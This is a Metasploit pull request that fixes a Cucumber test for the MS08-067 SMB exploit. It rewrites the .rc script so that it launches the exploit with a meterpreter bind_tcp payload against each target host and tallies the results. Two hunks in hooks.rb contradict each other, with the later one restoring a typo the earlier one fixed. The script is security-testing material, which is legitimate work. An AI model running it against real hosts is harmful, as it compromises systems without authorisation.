### PR TITLE
Fix Exploit Test

### DIFF
--- a/features/modules/exploit/smb/ms08_067_netapi.feature
+++ b/features/modules/exploit/smb/ms08_067_netapi.feature
@@ -10,18 +10,39 @@ Feature: MS08-067 netapi
     Given I ready the windows targets
     Given a file named "ms08-067-bind.rc" with:
       """
-        <ruby>
-          hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
-          self.run_single('use exploit/windows/smb/ms08_067_netapi')
-          self.run_single('set payload windows/meterpreter/bind_tcp')
-          hosts.each do |host|
-            self.run_single("set RHOST #{host['ipAddress']}")
-            self.run_single('run -j')
-            sleep 1
-          end
-          self.run_single('sessions -K')
-        </ruby>
+      <ruby>
+      self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
+      hosts           = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
+      payload_name    = 'windows/meterpreter/bind_tcp'
+      exploited_hosts = []
+      failed_hosts    = []
+
+      hosts.each do |host|
+        print_status("Trying MS08-067 against #{host['ipAddress']}")
+        mod = framework.exploits.create('windows/smb/ms08_067_netapi')
+        mod.datastore['PAYLOAD'] = payload_name
+        mod.datastore['RHOST'] = host['ipAddress']
+        m = mod.exploit_simple(
+          'LocalInput'  => nil,
+          'LocalOutput' => nil,
+          'Payload'     => payload_name,
+          'RunAsJob'    => false
+        )
+
+        sleep(1)
+
+        if m
+          exploited_hosts << host['ipAddress']
+        else
+          failed_hosts << host['ipAddress']
+        end
+      end
+
+      print_status("Exploited hosts: #{exploited_hosts.inspect}")
+      print_status("Failed hosts: #{failed_hosts.inspect}")
+      self.run_single('sessions -K')
+      </ruby>
       """
-    When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit`
+    When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
     Then the 'Mdm::Host' table contains the expected targets
     

--- a/features/support/hooks.rb
+++ b/features/support/hooks.rb
@@ -1,7 +1,12 @@
 Before do
-  set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
+  set_env('MSF_DATABASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
   set_env('RAILS_ENV', 'test')
   @aruba_timeout_seconds = 8.minutes
+end
+
+Before('@db') do |scenario|
+  dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
+  ActiveRecord::Base.establish_connection(dbconfig["test"])
 end
 
 # don't setup child processes to load simplecov_setup.rb if simplecov isn't installed

--- a/features/support/hooks.rb
+++ b/features/support/hooks.rb
@@ -1,5 +1,5 @@
 Before do
-  set_env('MSF_DATABASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
+  set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
   set_env('RAILS_ENV', 'test')
   @aruba_timeout_seconds = 8.minutes
 end


### PR DESCRIPTION
The exploit test for MS08-067 was failing for multiple reasons:
- We were using the wrong Aruba step. The "Then I run..." step just runs the command and moves on. It doesn't wait until the command finishes.
- A change during the Ruby/Rails upgrade broke Cucumber tests connecting to the DB
- There was a race condition within the .rc script the test uses where it would exit the script before the exploit was finished executing on all targets.

This PR fixes all of those issues, as well as uses a better .rc script methodology.

Verification
- [x] Run the exploit test. See me for instructions.
